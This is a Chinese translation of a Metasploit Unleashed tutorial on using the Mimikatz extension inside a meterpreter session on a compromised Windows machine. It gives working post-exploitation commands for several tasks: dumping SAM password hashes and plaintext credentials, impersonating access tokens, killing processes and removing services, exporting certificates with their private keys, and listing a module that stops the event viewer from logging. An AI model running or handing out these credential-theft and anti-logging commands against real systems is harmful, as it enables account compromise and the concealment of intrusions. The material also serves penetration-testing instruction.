原文:http://www.offensive-security.com/metasploit-unleashed/Mimikatz
翻译:http:///tips/2443
确保在system权限下执行mimikatz
通过尝试加载一个不存在的特性来得到可用模块的完整列表
meterpreter > mimikatz_command -f fu:: Module : 'fu' introuvable Modules disponibles : - Standard crypto - Cryptographie et certificats hash - Hash system - Gestion système process - Manipulation des processus thread - Manipulation des threads service - Manipulation des services privilege - Manipulation des privilèges handle - Manipulation des handles impersonate - Manipulation tokens d'accès winmine - Manipulation du démineur minesweeper - Manipulation du démineur 7 nogpo - Anti-gpo et patchs divers samdump - Dump de SAM inject - Injecteur de librairies ts - Terminal Server divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module sekurlsa - Dump des sessions courantes par providers LSASS efs - Manipulations EFS
使用如下的语法来请求某个模块可用的选项:
meterpreter > mimikatz_command -f divers:: Module : 'divers' identifié, mais commande '' introuvable Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module noroutemon - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage eventdrop - [super experimental] Patch l'observateur d'événements pour ne plus rien enregistrer cancelator - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session secrets - Affiche les secrets utilisateur
导出hash和明文证书:
方式一:msv
方式二:kerberos
方式三:mimikatz_command -f samdump::hashes
Handle模块可以用来list/kill进程以及模拟用户令牌:
mimikatz_command -f handle::
Service模块让你可以list/start/stop以及remove windows服务:
mimikatz_command -f service::
Crypto模块允许你list、export任何证书,以及储存在目标机器上相应的私钥:
mimikatz_command -f crypto::
扫雷:
mimikatz_command -f winmine::infos
